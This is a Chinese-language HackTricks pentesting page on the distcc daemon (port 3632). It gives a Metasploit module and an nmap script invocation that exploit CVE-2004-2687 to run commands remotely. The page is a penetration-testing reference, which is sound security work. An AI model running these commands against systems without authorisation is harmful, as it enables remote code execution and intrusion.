hacktricks/network-services-pentesting/3632-pentesting-distcc.md

从零开始学习AWS黑客技术，成为专家 htARTE（HackTricks AWS Red Team Expert）！

支持HackTricks的其他方式：

• 如果您想在HackTricks中看到您的公司广告或下载PDF格式的HackTricks，请查看订阅计划!
• 获取官方PEASS & HackTricks周边产品
• 探索PEASS家族，我们的独家NFTs
• 加入 💬 Discord群 或 电报群 或 关注我们的Twitter 🐦 @carlospolopm。
• 通过向HackTricks和HackTricks Cloud github仓库提交PR来分享您的黑客技巧。

基本信息

Distcc是一种工具，通过利用网络中其他计算机的空闲处理能力，增强了编译过程。当在一台机器上设置distcc时，该机器能够将其编译任务分发给另一台系统。接收系统必须运行distccd守护程序，并且必须安装有兼容的编译器以处理发送的代码。

默认端口： 3632

PORT     STATE SERVICE
3632/tcp open  distccd

漏洞利用

检查是否容易受到 CVE-2004-2687 漏洞的影响，以执行任意代码：

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-exec --script-args="distcc-exec.cmd='id'"

Shodan

我认为shodan没有检测到这项服务。

资源

• https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec
• https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855

由 Álex B (@r1p) 创建的帖子